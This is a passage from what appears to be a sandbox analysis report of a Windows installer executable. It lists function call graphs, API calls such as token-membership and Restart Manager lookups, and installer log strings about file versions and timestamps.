LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56938->57326 57332 47f33c 24 API calls 56939->57332 56943 480ac1 56940->56943 57330 47f50c 42 API calls 56940->57330 57331 47f33c 24 API calls 56943->57331 56946->56933 56949 480ac8 56950 480ada 56949->56950 56951 480ae0 56949->56951 56952 480ade 56950->56952 56955 47f4e8 42 API calls 56950->56955 56951->56952 56954 47f4e8 42 API calls 56951->56954 57053 47c66c 56952->57053 56954->56952 56955->56952 57054 42d898 GetWindowsDirectoryA 57053->57054 57055 47c690 57054->57055 57056 403450 4 API calls 57055->57056 57057 47c69d 57056->57057 57058 42d8c4 GetSystemDirectoryA 57057->57058 57059 47c6a5 57058->57059 57060 403450 4 API calls 57059->57060 57061 47c6b2 57060->57061 57062 42d8f0 6 API calls 57061->57062 57063 47c6ba 57062->57063 57064 403450 4 API calls 57063->57064 57065 47c6c7 57064->57065 57066 47c6d0 57065->57066 57067 47c6ec 57065->57067 57363 42d208 57066->57363 57069 403400 4 API calls 57067->57069 57071 47c6ea 57069->57071 57073 47c731 57071->57073 57075 42c8cc 5 API calls 57071->57075 57072 403450 4 API calls 57072->57071 57343 47c4f4 57073->57343 57077 47c70c 57075->57077 57079 403450 4 API calls 57077->57079 57078 403450 4 API calls 57080 47c74d 57078->57080 57081 47c719 57079->57081 57082 47c76b 57080->57082 57084 4035c0 4 API calls 57080->57084 57081->57073 57083 403450 4 API calls 57081->57083 57085 47c4f4 8 API calls 57082->57085 57083->57073 57084->57082 57086 47c77a 57085->57086 57087 403450 4 API calls 57086->57087 57088 47c787 57087->57088 57089 47c7af 57088->57089 57091 42c3fc 5 API calls 57088->57091 57090 47c816 57089->57090 57093 47c4f4 8 API calls 57089->57093 57092 47c8de 57090->57092 57096 47c836 SHGetKnownFolderPath 57090->57096 57094 47c79d 57091->57094 57098 47c8e7 57092->57098 57099 47c908 57092->57099 57097 47c7c7 57093->57097 57095 4035c0 4 API calls 57094->57095 57095->57089 57101 47c850 57096->57101 57102 47c88b SHGetKnownFolderPath 57096->57102 57103 403450 4 API calls 57097->57103 57102->57092 57325->56938 57327->56935 57328->56932 57329->56933 57330->56943 57331->56949 57332->56949 57344 42de1c RegOpenKeyExA 57343->57344 57345 47c51a 57344->57345 57346 47c540 57345->57346 57347 47c51e 57345->57347 57348 403400 4 API calls 57346->57348 57349 42dd4c 6 API calls 57347->57349 57350 47c547 57348->57350 57351 47c52a 57349->57351 57350->57078 57352 47c535 RegCloseKey 57351->57352 57353 403400 4 API calls 57351->57353 57352->57350 57353->57352 57364 4038a4 4 API calls 57363->57364 57366 42d21b 57364->57366 57365 42d232 GetEnvironmentVariableA 57365->57366 57367 42d23e 57365->57367 57366->57365 57370 42d245 57366->57370 57375 42dbd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57366->57375 57369 403400 4 API calls 57367->57369 57369->57370 57370->57072 57375->57366

                                                              Executed Functions

                                                              Function 004706A8 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 965COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Will register the file (a type library) later., xrefs: 00471513
                                                              • Version of our file: (none), xrefs: 00470AFC
                                                              • Time stamp of existing file: %s, xrefs: 00470A2B
                                                              • Dest filename: %s, xrefs: 00470894
                                                              • Failed to strip read-only attribute., xrefs: 00470ED3
                                                              • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                              • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                              • .tmp, xrefs: 00470FB7
                                                              • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                              • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                              • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                              • Non-default bitness: 32-bit, xrefs: 004708BB
                                                              • Same version. Skipping., xrefs: 00470CE5
                                                              • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                              • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                              • Dest file exists., xrefs: 004709BB
                                                              • InUn, xrefs: 0047115F
                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                              • Non-default bitness: 64-bit, xrefs: 004708AF
                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                              • Same time stamp. Skipping., xrefs: 00470D55
                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                              • @, xrefs: 004707B0
                                                              • Stripped read-only attribute., xrefs: 00470EC7
                                                              • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                              • Installing into GAC, xrefs: 00471714
                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                              • -- File entry --, xrefs: 004706FB
                                                              • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                              • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                              • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                              • Version of existing file: (none), xrefs: 00470CFA
                                                              • Installing the file., xrefs: 00470F09
                                                              • Time stamp of our file: %s, xrefs: 0047099B
                                                              • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                              • API String ID: 0-4021121268
                                                              • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                              • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                              • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                              • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19
                                                              Function 0042E09C Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                              • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                              • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                              • API String ID: 2252812187-1888249752
                                                              • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                              • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                              • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                              • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
                                                              Function 004502C0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                              APIs
                                                              • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                              • GetProcAddress.KERNEL32(6E130000,RmStartSession), ref: 00450309
                                                              • GetProcAddress.KERNEL32(6E130000,RmRegisterResources), ref: 0045031E
                                                              • GetProcAddress.KERNEL32(6E130000,RmGetList), ref: 00450333
                                                              • GetProcAddress.KERNEL32(6E130000,RmShutdown), ref: 00450348
                                                              • GetProcAddress.KERNEL32(6E130000,RmRestart), ref: 0045035D
                                                              • GetProcAddress.KERNEL32(6E130000,RmEndSession), ref: 00450372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadVersion
                                                              • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                              • API String ID: 1968650500-3419246398
                                                              • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                              • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                              • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                              • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
                                                              Function 00423C0C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1817 423c63-423c6b 1794->1817 1818 423c70-423c72 1794->1818 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1807 423fb1-423fb9 1800->1807 1808 423cf9-423d01 1800->1808 1811 423d32-423d35 1801->1811 1812 42409a-4240a8 IsIconic 1801->1812 1809 423cc5-423cc8 1802->1809 1810 423c98 1802->1810 1805 423d62-423d67 1803->1805 1806 423d6b-423d73 call 424194 1803->1806 1819 423d78-423d80 call 4241dc 1805->1819 1820 423d69-423d8c call 423b84 1805->1820 1813 424152-42415a 1806->1813 1807->1813 1814 423fbf-423fca call 4181e0 1807->1814 1822 423f13-423f3a SendMessageA 1808->1822 1823 423d07-423d0c 1808->1823 1815 423da9-423db0 1809->1815 1816 423cce-423ccf 1809->1816 1825 423df6-423e06 call 423b84 1810->1825 1826 423c9e-423ca1 1810->1826 1827 4240d6-4240eb call 424850 1811->1827 1828 423d3b-423d3c 1811->1828 1812->1813 1824 4240ae-4240b9 GetFocus 1812->1824 1835 424171-424177 1813->1835 1814->1813 1869 423fd0-423fdf call 4181e0 IsWindowEnabled 1814->1869 1815->1813 1830 423db6-423dbd 1815->1830 1831 423cd5-423cd8 1816->1831 1832 423f3f-423f46 1816->1832 1817->1835 1818->1792 1818->1794 1819->1813 1820->1813 1822->1813 1833 423d12-423d13 1823->1833 1834 42404a-424055 1823->1834 1824->1813 1842 4240bf-4240c8 call 41eff4 1824->1842 1825->1813 1843 423ca7-423caa 1826->1843 1844 423e1e-423e3a PostMessageA call 423b84 1826->1844 1827->1813 1837 423d42-423d45 1828->1837 1838 4240ed-4240f4 1828->1838 1830->1813 1850 423dc3-423dc9 1830->1850 1851 423cde-423ce1 1831->1851 1852 423e3f-423e5f call 423b84 1831->1852 1832->1813 1859 423f4c-423f51 call 404e54 1832->1859 1853 424072-42407d 1833->1853 1854 423d19-423d1c 1833->1854 1834->1813 1856 42405b-42406d 1834->1856 1857 424120-424127 1837->1857 1858 423d4b 1837->1858 1847 4240f6-424109 call 4244d4 1838->1847 1848 42410b-42411e call 42452c 1838->1848 1842->1813 1902 4240ce-4240d4 SetFocus 1842->1902 1864 423cb0-423cb3 1843->1864 1865 423ea5-423eac 1843->1865 1844->1813 1847->1813 1848->1813 1850->1813 1870 423ce7 1851->1870 1871 423e0b-423e19 call 424178 1851->1871 1912 423e83-423ea0 call 423a84 PostMessageA 1852->1912 1913 423e61-423e7e call 423b14 PostMessageA 1852->1913 1853->1813 1878 424083-424095 1853->1878 1875 423d22 1854->1875 1876 423f56-423f5e 1854->1876 1856->1813 1873 42413a-424149 1857->1873 1874 424129-424138 1857->1874 1877 42414b-42414c call 423b84 1858->1877 1859->1813 1884 423cb9-423cba 1864->1884 1885 423dce-423ddc IsIconic 1864->1885 1866 423eae-423ec1 call 423b14 1865->1866 1867 423edf-423ef0 call 423b84 1865->1867 1916 423ed3-423eda call 423b84 1866->1916 1917 423ec3-423ecd call 41ef58 1866->1917 1921 423ef2-423ef8 call 41eea4 1867->1921 1922 423f06-423f0e call 423a84 1867->1922 1869->1813 1918 423fe5-423ff4 call 4181e0 IsWindowVisible 1869->1918 1870->1877 1871->1813 1873->1813 1874->1813 1875->1877 1876->1813 1900 423f64-423f6b 1876->1900 1908 424151 1877->1908 1878->1813 1886 423cc0 1884->1886 1887 423d91-423d99 1884->1887 1893 423dea-423df1 call 423b84 1885->1893 1894 423dde-423de5 call 423bc0 1885->1894 1886->1877 1887->1813 1914 423d9f-423da4 call 422c4c 1887->1914 1893->1813 1894->1813 1900->1813 1911 423f71-423f80 call 4181e0 IsWindowEnabled 1900->1911 1902->1813 1908->1813 1911->1813 1940 423f86-423f9c call 412310 1911->1940 1912->1813 1913->1813 1914->1813 1916->1813 1917->1916 1918->1813 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1918->1941 1938 423efd-423f00 1921->1938 1922->1813 1938->1922 1940->1813 1945 423fa2-423fac 1940->1945 1941->1813 1945->1813
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                              • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                              • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                              • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                              Function 004673A4 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1649windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                              APIs
                                                                • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
